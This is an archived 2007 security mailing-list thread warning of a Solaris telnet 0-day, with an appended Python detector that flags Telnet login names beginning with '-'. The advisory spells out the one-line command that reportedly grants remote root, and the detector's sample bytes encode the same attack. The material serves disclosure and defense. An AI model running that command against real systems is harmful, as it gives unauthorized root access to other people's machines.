[Dshield] Solaris Telnet 0-day (Important!)

Gadi Evron ge at linuxbox.org
Mon Feb 12 04:42:54 GMT 2007


On Sun, 11 Feb 2007, Nicholas Albright wrote:
> 
> Can anyone confirm if this will work locally as an elevation of
> privileges? -I know, just download and test for yourself...- Sun's site
> is exceedingly slow with my download at the moment. :)

AHHH! So this 10-year-old vulnerability is a PR stunt to get people to
download Solaris! :)

	Gadi.

> 
> regards,
> 
> Nicholas
> 
> 
> Johannes B. Ullrich wrote:
> > If you run Solaris, please check if you got telnet enabled NOW. If you
> > can, block port 23 at your perimeter. There is a fairly trivial Solaris
> > telnet 0-day.
> > 
> > telnet -l "-froot" [hostname]
> > 
> > will give you root on many Solaris systems with default installs.
> > We are still testing. Please use our contact form at
> > https://isc.sans.org/contact.html
> > if you have any details about the use of this exploit.
> > 
> > ------------------------------------------------------------------------
> > 
> > _________________________________________
> > 
> > SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> > taught by our top rated instructors plus a huge vendor tools expo.
> > Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)
> 
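
Added example, not part of the original thread or of any tool mentioned in it: a Python check that a sensor in front of port 23 could run over captured client bytes to flag the login-name form quoted above, a USER value beginning with `-`. It assumes the client sends its `-l` argument as the `USER` variable of the Telnet NEW-ENVIRON option (RFC 1572); the function names and the sample bytes are constructed for illustration.

```python
IAC, SB, SE = 0xFF, 0xFA, 0xF0
NEW_ENVIRON = 0x27                      # option code 39 (RFC 1572)
IS, INFO = 0x00, 0x02                   # sub-commands that carry client values
VAR, VALUE, ESC, USERVAR = 0x00, 0x01, 0x02, 0x03

def subnegotiations(stream: bytes):
    """Yield (option, payload) for each complete IAC SB ... IAC SE block."""
    i = 0
    while True:
        i = stream.find(bytes([IAC, SB]), i)
        if i < 0 or i + 2 >= len(stream):
            return
        option, i = stream[i + 2], i + 3
        payload = bytearray()
        while i < len(stream):
            if stream[i] == IAC and i + 1 < len(stream):
                if stream[i + 1] == SE:
                    yield option, bytes(payload)
                    i += 2
                    break
                if stream[i + 1] == IAC:    # IAC IAC is one literal 0xFF
                    payload.append(IAC)
                    i += 2
                    continue
            payload.append(stream[i])
            i += 1

def environ_vars(payload: bytes) -> dict:
    """Decode an IS/INFO payload into {name: value}; ESC quotes the next byte."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    fields, slot, it = [], 0, iter(payload[1:])
    for b in it:
        if b in (VAR, USERVAR):
            fields.append([bytearray(), bytearray()])
            slot = 0
        elif b == VALUE and fields:
            slot = 1
        elif fields:
            fields[-1][slot].append(next(it, ESC) if b == ESC else b)
    return {bytes(n).decode("latin-1"): bytes(v).decode("latin-1") for n, v in fields}

def suspicious_users(stream: bytes) -> list:
    """USER values a login program could mistake for a command-line option."""
    envs = (environ_vars(p) for opt, p in subnegotiations(stream) if opt == NEW_ENVIRON)
    return [e["USER"] for e in envs if e.get("USER", "").startswith("-")]

# Constructed sample: IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-froot" IAC SE
SAMPLE = b"\xff\xfa\x27\x00\x00USER\x01-froot\xff\xf0"
```

`suspicious_users(SAMPLE)` returns `["-froot"]`; an incomplete subnegotiation (no closing IAC SE) yields nothing, so the check should be fed reassembled client-to-server bytes rather than single packets.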


